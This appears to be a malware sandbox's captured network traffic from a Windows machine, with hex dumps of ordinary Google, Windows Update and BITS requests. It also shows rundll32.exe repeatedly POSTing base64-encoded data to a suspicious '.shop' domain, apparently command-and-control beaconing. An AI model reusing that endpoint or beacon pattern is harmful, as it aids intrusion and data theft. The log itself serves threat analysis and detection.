data-s="wdjV_a65TwD5vV5Zq3JrA-AuyuvqjMiT_
2024-04-26 21:16:41 UTC	960	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	142.250.217.228	443	7244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:41 UTC	912	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGLizsLEGIjBzxD8y3zpVM4rvYXOzD0wZHGfxDV2C93K9X3HWoqlaBUqfM3Uck6U5jewh4t8bDhoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-21; NID=513=UowfF3gRb-VEPPE7VIYxDTZwjoWg8ud9RDcXC8lTIuA_racxo5lcoiIPCNawi8P-2VoGw5HUUmmcSiDTYaOtK75Zr8F2x6a3xTaKMIWLcX8zMSUJcARngZXAUOfcFD7ay0O3J-Bpq4ODfH4oORUkZCP-9pENI39m6kruvf_I5S4
2024-04-26 21:16:41 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 21:16:41 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3186 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 21:16:41 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-26 21:16:41 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 59 71 71 66 4b 49 34 31 69 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="YqqfKI41i
2024-04-26 21:16:41 UTC	1032	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:48 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 21:16:48 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: a8180758-4aee-4d87-9061-c5cd96a39026 MS-RequestId: f7c6087c-c2bc-42db-af40-d78345a7f8f0 MS-CV: 1qNSqs+oRkGUmZms.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 21:16:47 GMT Connection: close Content-Length: 24490
2024-04-26 21:16:48 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-26 21:16:48 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49753	23.46.214.6	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:49 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 21:16:49 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=35219 Date: Fri, 26 Apr 2024 21:16:49 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	23.46.214.6	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:49 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 21:16:49 UTC	520	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-MSEdge-Ref: Ref A: 86D4C1EC23844E65A40A9F1508D7BABF Ref B: BL2EDGE2514 Ref C: 2023-04-05T23:36:05Z Cache-Control: public, max-age=35162 Date: Fri, 26 Apr 2024 21:16:49 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-26 21:16:49 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:17:27 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 21:17:28 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 901e2c2b-7686-40cd-aca9-7c32bffd58c9 MS-RequestId: 3ad15113-5b36-428c-a610-925e345e22db MS-CV: n268N0i4YkqK8pHL.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 21:17:27 GMT Connection: close Content-Length: 25457
2024-04-26 21:17:28 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-26 21:17:28 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	104.21.46.75	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:11 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 252 Cache-Control: no-cache
2024-04-26 21:18:11 UTC	252	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c 44 34 34 36 7a 6b 6c 57 6a 51 57 64 6d 37 44 7a 2f 4a 69 59 68 72 59 4f 54 5a 52 2b 77 70 62 79 6a 5a 4c 30 76 38 45 63 32 62 47 74 6a 38 65 4f 48 65 6e 76 57 75 4a 30 54 4e 48 48 4d 35 72 4a 53 42 39 44 57 51 3d 3d Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uLD446zklWjQWdm7Dz/JiYhrYOTZR+wpbyjZL0v8Ec2bGtj8eOHenvWuJ0TNHHM5rJSB9DWQ==
2024-04-26 21:18:18 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xwKdWA%2FaRBcDFCB42BITeO5%2BLkZq4U8Ex7Z3ohfzHjZsiq9jEbpFZ32gJBOdv41tCjYakfNN0RJvmaHnZ%2F%2BI%2F1k54yzU9uPtKGp43IQSXoaTN91jRYMQ62JSd6Q3QKYB6d1C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99a988b4d09a2-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:18 UTC	26	IN	Data Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a Data Ascii: 14QhOmMB2npTVqDJOocQ==
2024-04-26 21:18:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49761	104.21.46.75	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:20 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-26 21:18:23 UTC	570	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZXgwyJoXpCPzEWtRgjEVwktX60bM5NYG6yQscZ25bg3NxHioVZv%2BqQ1uOcEAxw3J14B79mc2o210HILATI8AFhx8hW%2FBlQGtea4FHhktEPNQ9fvISKM7EFgnQVpOBFeBonBa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99ad16923a4d3-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49762	104.21.46.75	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:24 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:24 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-26 21:18:30 UTC	574	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDOcMhjjClNWy%2B%2BkPdzT6Xv5v%2FHlzsSnnnvStjUaWtcq75lQE4M0s5PhYSCuVedatHxHEsr%2FwvffUF9TfgzAUy3YTxx0nNJ1x31WRCXAkK0szgcfMbYfSdcpZT5N9awGSznv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99aeb4a318dcd-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:18:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	104.21.46.75	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:18:30 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:18:30 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 49 52 34 78 71 33 38 64 37 54 58 47 61 4c 55 73 2f 77 6e 56 42 66 77 74 44 30 36 37 52 38 6e 58 62 57 63 4a 61 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 34 44 4a 6a 46 45 61 64 5a 79 64 71 75 72 56 5a 2b 30 41 47 45 51 34 57 79 42 47 61 71 77 38 70 48 6f 54 30 38 38 6a 2f 43 54 4b 44 63 52 54 6b 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiCzIR4xq38d7TXGaLUs/wnVBfwtD067R8nXbWcJaBWLUUfs9FloPMfPu+9sL8KXzJchOQ4DJjFEadZydqurVZ+0AGEQ4WyBGaqw8pHoT088j/CTKDcRTkLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-26 21:18:35 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:18:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=waFQXUxtfKeMHMMbaVo1P6Ec35bFwWIo8TmwPcZ%2B7m9VDufG60Bh5YIYaoPj4aZYpbljb3xRAdhJkWbJrLlcr6DPFJ%2B94HBAqqUDC%2BVI%2Fa2csg4AuOFAOQDls3%2B5MRvA9LP8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99b14a84b2206-MIA alt-svc: h3=":443"; ma=86400
